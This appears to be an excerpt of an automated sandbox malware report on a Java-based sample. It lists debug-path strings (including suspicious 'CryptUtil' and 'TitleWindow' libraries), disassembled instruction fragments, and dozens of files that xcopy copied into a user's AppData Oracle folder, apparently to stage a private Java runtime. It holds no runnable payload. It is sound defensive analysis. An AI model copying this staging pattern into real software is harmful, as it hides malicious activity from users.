        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libverify\verify.pdb source: xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsdt\jsdt.pdb source: xcopy.exe, 00000015.00000003.1725315701.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2pkcs11\j2pkcs11.pdb source: xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjaas\jaas_nt.pdb source: xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2pcsc\j2pcsc.pdb source: xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1698710106.00000000004DC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jabswitch\jabswitch.pdb source: xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\x64\Release\CryptUtil.pdb source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005000000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000502A000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libkrb5\w2k_lsa_auth.pdb source: xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdb source: xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: d:\a01\_work\38\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: xcopy.exe, 00000015.00000003.1741105307.00000000004E0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjawtaccessbridge-32\JAWTAccessBridge-32.pdb source: xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jabswitch\jabswitch.pdb,,+ source: xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1700108241.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2gss\j2gss.pdb source: xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjawt\jawt.pdb source: xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libsspi_bridge\sspi_bridge.pdb source: xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\liblcms\lcms.pdb source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1698710106.00000000004DC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2pkcs11\j2pkcs11.pdb## source: xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\liblcms\lcms.pdb11 source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsoundds\jsoundds.pdb source: xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libdt_socket\dt_socket.pdb source: xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmanagement\management.pdb&& source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsound\jsound.pdb## source: xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnpt\npt.pdb source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: xcopy.exe, 00000015.00000003.1728816995.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\npjp2\obj\npjp2.pdbEE, source: xcopy.exe, 00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1700293859.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Win10\Desktop\RetriveTitle_vb2010\Release\TitleWindow.pdb source: javaw.exe, 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A707000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libsplashscreen\splashscreen.pdb source: xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1699288851.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libt2k\t2k.pdb:: source: xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnio\nio.pdb'' source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnet\net.pdb source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsound\jsound.pdb source: xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmanagement\management.pdb source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdbP8PP@Y source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005052000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000502A000.00000004.00000800.00020000.00000000.sdmp
        Source: msvcp140.dll.21.drStatic PE information: 0xEDEDFA22 [Fri Jun 29 08:17:38 2096 UTC]
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_73A945FB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,6_2_73A945FB
        Source: unpack200.exe.21.drStatic PE information: section name: .00cfg
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 2_2_02DFA21B push ecx; ret 2_2_02DFA225
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 2_2_02DFA20A push ecx; ret 2_2_02DFA21A
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 2_2_02DFB3B7 push 00000000h; mov dword ptr [esp], esp2_2_02DFB3DD
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 2_2_02DFBB67 push 00000000h; mov dword ptr [esp], esp2_2_02DFBB8D
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 2_2_02DFB947 push 00000000h; mov dword ptr [esp], esp2_2_02DFB96D
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 2_2_02DFC477 push 00000000h; mov dword ptr [esp], esp2_2_02DFC49D
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_3_156FC5E6 pushad ; retf 6_3_156FC5ED
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_3_156FCB90 pushad ; retf 6_3_156FCB91
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_3_156FCA72 push eax; retf 6_3_156FCA85
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_3_156FC61A pushad ; retf 6_3_156FC679
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_3_156FE8EA pushad ; retf 6_3_156FE8F9
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_3_156FE8A2 pushad ; retf 6_3_156FE8B1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_3_1512832A pushad ; iretd 6_3_15128341
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_3_151299DC pushad ; retf 0028h6_3_151299DD
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_3_15129AE3 push eax; retf 6_3_15129B0D
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_3_1512832A pushad ; iretd 6_3_15128341
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_3_151299DC pushad ; retf 0028h6_3_151299DD
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_3_15129AE3 push eax; retf 6_3_15129B0D
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_73A92E75 push ecx; ret 6_2_73A92E88
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_02978A11 push cs; retf 6_2_02978A31
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_02981F88 push es; retn 0024h6_2_02981F8B
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_0297ECE0 pushfd ; iretd 6_2_0297ECE1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_0297D5FB push es; retn 0001h6_2_0297D6FF
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_028DD8F7 push 00000000h; mov dword ptr [esp], esp6_2_028DD921
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_028DA20A push ecx; ret 6_2_028DA21A
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_028DA21B push ecx; ret 6_2_028DA225
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_028DB3B7 push 00000000h; mov dword ptr [esp], esp6_2_028DB3DD
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_028DBB67 push 00000000h; mov dword ptr [esp], esp6_2_028DBB8D
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_028DD8E0 push 00000000h; mov dword ptr [esp], esp6_2_028DD921
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_028DB947 push 00000000h; mov dword ptr [esp], esp6_2_028DB96D
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_028DC477 push 00000000h; mov dword ptr [esp], esp6_2_028DC49D
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\awt.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_1.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\sunec.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\java.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-string-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-2-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\verify.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\management.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-util-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\zip.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_2.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\java.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\vcruntime140.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\net.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\j2gss.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\vcruntime140.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\sspi_bridge.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\ucrtbase.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeFile created: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dllJump to dropped file
